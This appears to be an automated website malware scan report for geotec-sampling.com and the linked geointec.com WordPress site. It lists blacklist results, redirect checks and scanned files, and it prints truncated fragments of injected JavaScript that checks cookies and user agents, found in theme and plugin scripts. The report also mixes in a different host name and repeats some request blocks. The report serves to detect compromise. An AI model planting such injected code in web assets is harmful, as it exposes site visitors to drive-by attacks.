Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=geotec-sampling.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://geotec-sampling.com/
Result: The website is marked by Yandex as suspicious — visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious — visiting this website may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: magnumgraphics.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Sep 2014 21:49:25 GMT
Accept-Ranges: bytes
ETag: "1998209-583-4cd7c210"
Server: Apache
Content-Length: 1411
Content-Type: text/html
Last-Modified: Mon, 08 Nov 2010 09:25:36 GMT
...1411 bytes of data.
GET / HTTP/1.1
Host: magnumgraphics.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Sep 2014 21:49:25 GMT
Accept-Ranges: bytes
ETag: "1998209-583-4cd7c210"
Server: Apache
Content-Length: 1411
Content-Type: text/html
Last-Modified: Mon, 08 Nov 2010 09:25:36 GMT
...1411 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: magnumgraphics.com
Referer: http://www.google.com/search?q=magnumgraphics.com
Result:
The response is the same as for the first query; no suspicious referrer-dependent redirects were found.
GET / HTTP/1.1
Host: magnumgraphics.com
Referer: http://www.google.com/search?q=magnumgraphics.com
Result:
The response is the same as for the first query; no suspicious referrer-dependent redirects were found.
Scanned pages/files
Request | Server response | Status |
http://www.geotec-sampling.com/ | 200 OK Content-Length: 855 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: asg-geotecnia.es <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /</title> </head> <body> <h1>Index of /</h1> <ul><li><a href=".ftpquota"> .ftpquota</a></li> <li><a href="asg-geotecnia.es/"> asg-geotecnia.es/</a></li> <li><a href="cgi-bin/"> cgi-bin/</a></li> <li><a href="geointec.com/"> geointec.com/</a></li> <li><a href="geotec-sampling.com/"> geotec-sampling.com/</a></li> <li><a href="hmoreno/"> hmoreno/</a></li> <li><a href="readme.html"> readme.html</a></li> &l ...[520 bytes skipped]... | ||
http://www.geotec-sampling.com/.ftpquota | 403 Forbidden Content-Length: 330 Content-Type: text/html | clean |
http://www.geotec-sampling.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.geotec-sampling.com/asg-geotecnia.es/ | 200 OK Content-Length: 316 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: asg-geotecnia.es <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /asg-geotecnia.es</title> </head> <body> <h1>Index of /asg-geotecnia.es</h1> <ul><li><a href="/"> Parent Directory</a></li> <li><a href="google36d5d9cc0ca81a66.html"> google36d5d9cc0ca81a66.html</a></li> </ul> </body></html> | ||
http://www.geotec-sampling.com/asg-geotecnia.es/google36d5d9cc0ca81a66.html | 200 OK Content-Length: 53 Content-Type: text/html | clean |
http://www.geotec-sampling.com/cgi-bin/ | 403 Forbidden Content-Length: 329 Content-Type: text/html | clean |
http://www.geotec-sampling.com/geointec.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 10 Oct 2014 22:05:30 GMT Location: http://www.geointec.com/wp-signup.php?new=www.geotec-sampling.com Server: nginx admin Content-Length: 0 Content-Type: text/html X-Cache: HIT from Backend X-Powered-By: PHP/5.3.28 | malicious |
http://www.geointec.com/wp-signup.php?new=www.geotec-sampling.com | 200 OK Content-Length: 63418 Content-Type: text/html | clean |
http://www.geointec.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://www.geointec.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.geointec.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.5.95&ver=4.0 | 200 OK Content-Length: 95731 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see antivirus reports below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo })(jQuery) Antivirus reports:
| ||
http://www.geointec.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.5.95&ver=4.0 | 200 OK Content-Length: 107645 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see antivirus reports below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo Antivirus reports:
| ||
http://www.geointec.com/wp-content/themes/rttheme18/js/modernizr.min.js?ver=4.0 | 200 OK Content-Length: 15865 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see antivirus reports below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo Antivirus reports:
| ||
http://www.geointec.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.18 | 200 OK Content-Length: 17265 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see antivirus reports below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo Antivirus reports:
| ||
http://www.geointec.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.1 | 200 OK Content-Length: 9103 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see antivirus reports below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo $(this).find('span.wpcf7-not-valid-tip').remove(); $(this).find('img.ajax-loader').css({ visibility: 'hidden' }); }); }; $.fn.wpcf7FillResponseOutput = function(message) { return this.each(function() { $(this).find('div.wpcf7-response-output').append(message).slideDown('fast'); }); }; })(jQuery); Antivirus reports:
| ||
http://www.geointec.com/wp-content/themes/rttheme18/js/jquery.easing.1.3.js?ver=4.0 | 200 OK Content-Length: 8704 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see antivirus reports below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
|